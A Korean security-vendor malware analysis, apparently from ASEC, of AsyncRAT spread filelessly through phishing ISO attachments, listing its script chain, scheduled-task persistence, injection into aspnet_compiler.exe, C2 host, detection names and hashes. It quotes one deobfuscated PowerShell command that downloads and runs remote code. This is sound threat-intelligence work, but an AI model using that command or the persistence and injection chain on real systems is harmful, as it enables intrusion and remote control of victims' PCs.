FileLess 형태로 유포 중인 AsyncRAT

ASEC 분석팀은 최근 FileLess 형태로 AsyncRAT 악성코드가 유포 중인 것을 확인하였다. 유포 중인 AsyncRAT 은 다수의 스크립트 파일을 통해 FileLess 형태로 실행되며, 이메일 내 압축파일로 첨부되어 유포되는 것으로 추정된다. AsyncRAT 은 닷넷으로 개발된 오픈 소스 RAT 악성코드로 공격자의 명령을 받아 다양한 악성 행위를 수행할 수 있다.

피싱 메일을 통해 유포되는 압축파일 내부에는 html 파일이 존재하며, 실행 시 내부 스크립트에 존재하는 악성 데이터를 ISO 파일로 저장한다. ISO 는 최근 다양한 악성코드들이 사용 중인 확장자이다.

생성되는 ISO 파일은 영수증 및 송장과 관련된 파일명을 사용하며, ISO 파일 내부에는 VBScript 와 bat 파일이 존재한다.

• 파일명
  Receipt.iso
  Paid_invoice.iso

VBScript 는 함께 생성된 bat 파일을 실행하며, bat 파일은 난독화된 명령어를 실행한다.

난독화가 해제된 명령어는 아래와 같으며, cmd 를 통해 악성 파워쉘 명령어를 실행한다. 파워쉘 명령어는 특정 주소에 존재하는 추가 파워쉘 명령어를 실행하게 된다.

• 난독화 해제된 명령어
  CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$XCZM=’IEX(NEW-OBJECT NET.W’;$SYWD=’EBCLIENT).DOWNLO’;[BYTE[]];$VFDR=’TUUL(”hxxps://aga12[.]ir/ico.png”)’.REPLACE(‘TUUL’,’ADSTRING’);[BYTE[]];IEX($XCZM+$SYWD+$VFDR)

추가 파워쉘 명령어의 일부는 아래와 같으며, 총 5개의 스크립트 파일을 생성 후 실행하는 기능을 수행한다. 생성되는 5개의 스크립트 기능은 아래에서 소개한다.

1. C:\ProgramData\Express\xx.vbs

5개의 스크립트가 생성된 후 제일 처음으로 실행되는 스크립트 파일이다. 해당 스크립트는 함께 생성된 C:\ProgramData\Express\xx.bat 파일을 실행한다.

2. C:\ProgramData\Express\xx.bat

해당 스크립트는 C:\ProgramData\Express\Cotrl.vbs 파일을 작업 스케줄러에 등록하는 기능을 수행한다. 스케줄러에 등록된 파일은 3분마다 실행되도록 한다.

3. C:\ProgramData\Express\Cotrl.vbs

해당 스크립트는 C:\ProgramData\Express\Cotrl.bat 파일을 실행한다.

4. C:\ProgramData\Express\Cotrl.bat

해당 스크립트는 파워쉘 프로세스를 강제 종료 후 C:\ProgramData\Express\Cotrl.ps1 파일을 실행한다.

5. C:\ProgramData\Express\Cotrl.ps1

최종적으로 실행되는 해당 스크립트가 실제 악성 행위를 수행한다. 스크립트 내부에는 2개의 악성 데이터가 존재하며, 각각 Loader 와 AsyncRAT 이다. 먼저 Loader 역할을 수행하는 첫번째 데이터가 로드되며, 해당 데이터의 GIT.local 의 Execute 메소드를 실행한다. 이때  “C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe” 경로와 두번째 데이터 (AsyncRAT) 가 인자로 전달된다.

GIT.local 의 Execute 메소드는 아래와 같으며, 인자로 전달받은 경로와 악성 데이터를 이용하여 정상 프로세스(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe) 에 인젝션을 수행하게 된다.

인젝션되는 데이터는 AsyncRAT 으로, 깃허브에 공개된 오픈 소스 RAT 악성코드이다. C2 로부터 공격자 명령을 받아 다양한 악성 행위를 수행할 수 있으며, 대부분의 기능은 전달받는 플러그인을 통해 악성 행위가 수행된다. 기본적으로 존재하는 기능은 Anti-VM, 키로깅, 원격 쉘 등 이 존재한다.

• C2
  vrln200.duckdns[.]org:6666

최근 ISO 파일을 통해 유포되는 악성코드가 증가하고 있다. 또한, FileLess 형태로 악성코드가 실행되어 사용자가 어떤 유형의 악성코드가 실행되었는지 파악하기 어렵도록 한다. 사용자들은 출처가 불분명한 파일의 열람은 자제해야하며, 주기적인 PC 검사가 필요하다.

[파일 진단]
Dropper/HTML.Generic (2022.08.11.03)
Trojan/PowerShell.Loader (2022.08.18.00)
Dropper/ISO.Agent (2022.08.18.00)
Trojan/BAT.Runner (2022.08.18.00)
Downloader/BAT.Generic (2022.08.18.00)
Trojan/VBS.Runner (2022.08.18.00)

 

MD5

2a1082f25edff1dc5383239b1b012179

309d105bf0542574a9324f568b176021

43ff49fbde6f4391891cf2a46b406da4

448516ed6b6ef06865afbc775cd80bed

752d899ee21cbdd31126e205b5840286

URL

http[:]//vrln200[.]duckdns[.]org[:]6666/

https[:]//aga12[.]ir/ico[.]png